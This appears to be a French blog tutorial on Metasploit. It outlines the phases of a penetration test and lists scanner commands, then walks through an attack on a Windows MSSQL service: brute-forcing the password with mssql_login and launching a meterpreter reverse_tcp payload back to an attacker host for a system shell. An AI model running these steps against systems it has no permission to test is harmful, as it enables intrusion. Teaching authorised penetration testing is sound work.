Metasploit

metasploit_Acceuil

Qu’est-ce que c’est?

  • Metasploit est issue d’un projet open-source.
  • Son but est d’aider à la pénétration des systèmes informatiques
  • Il est utilisé par :
    • les administrateurs pour tester la vulnérabilité de leurs systèmes informatiques afin de les protéger
    • les Cyberpirates pour commettre des actes illégaux

Les phases du pentesting

metasploit_article
Pré-engagement :

  • Description du contexte technique et des modalités du test d’intrusion

Collecte de renseignements :

  • Le but est de savoir comment l’organisation cible opère pour en ressortir les potentielles vulnérabilités
  • Utilisation d’outils telle que les réseaux sociaux, google hacking, shodan, social engineering …

Détermination de la menace :

  • Identification de la source du risque
  • Idendifier les vulnérabilités

Analyse des vulnérabilités :

  • Identification des failles

Exploit :

  • phase d’attaque.
  • À utiliser dans le cadre d’une attaque réussie

Post exploitation :

  • Considération des dommages collatéraux d’une intrusion

Commandes utilisées :

Collecte d’informations active

  • Scanneur de port Nmap : msfconsole [nmap -A -sS -Pn siteWeb]
    • -sS = scan TCP discret
    • -Pn = sans utiliser de ping
    • -A = récupére la bannière
  • Scanneur de port Métasploit : msf> use auxiliary/scanner/portscan/syn
    • set RHOSTS [ IP_cible]
    • set THREADS 16 (16 étant le max)
    • run
  • Scanneur SMB ( permet d’identifier la version de Windows en utilisant le module smb_version)
    • msf > use auxiliary/scanner/smb/smb_version
    • show options
  • Microsoft SQL mal configurés
    • msf>use auxiliary/scanner/mssql/mssql_ping
    • show options
  • Scanneur SSH
    • msf>use auxiliary/scanner/ssh/ssh_version
    • set THREADS 16
    • run
  • Scanneur FTP
    • msf>use auxiliary/scanner/ftp/ftp_version
    • show options
  • Scanneur SNMP
    • msf>use auxiliary/scanner/snmp/snmp_login
    • set RHOSTS [IP_CIBLE]
    • set THREADS 16
    • run

Scanneur de vulnérabilités

  • Netcate de Metasploit
    • msf3#nc [IP_CIBLE]
  • Nessus

Exploitation

  • Msf>search permet de rechercher des exploits, scanner, module… (search mssql, search auxiliary …)
  • Msf>show exploits permet d’afficher tous les exploits disponibles du framework
    • Use permet utiliser l’exploit. Ex : use windows/smb/ms08_067_netapi
    • Show targets permet de sélectionner l’OS dont l’exploit s’applique
    • Info montre plus de détail sur l’exploit
    • Set permet de sélectionner le targets. Ex : set TARGET 3
  • Msf> show payload permet d’afficher les payloads
    • Set permet de sélectionner un objet. Ex : set payload/windows/meterpreter/reverse_tcp
  • Msf>show options
    • Lorsqu’un module est sélectionné, show option affiche uniquement les options qui s’appliquent à ce module

Exemple de pénétration d’un OS Windows(service sql) :

  • On lance un scan pour voir si le service sql est présent
    • nmap -sU [IP_cible] -p [Port_cible]
  • si sql présent, on utilise le module « mssql_login » pour bruteforcer le mots de pass
    • use scanner/mssql/mssql_login
    • set PASS_FILE/pentest/exploits/fasttrack/bin/dict/worldlist.txt
    • set RHOSTS[IP_cible]
    • set THREADS 10
    • set verbose false
    • exploit
  • Une fois que nous avons le mots de pass, nous pouvons lancer un payload pour obtenir une commande shell
    • use windows /mssql/mssql_payload => permet d’avoir « cmd.exe » niveau systeme
    • set PAYLOAD windows /meterpreter/reverse_tcp
    • set LHOST [ip attaquant]
    • set LPORT 443
    • set RHOST [ip cible]
    • set PASSWORD [mots passe obtenu avec mssql_login]
    • exploit

    En savoir plus :

    Je vous recommande le très bon livre « Hacking, sécurité et tests d’intrusion avec Metasploit » de l’éditions Pearson que j’ai trouvé bien réaliser.

    Related Posts

    Comments are closed.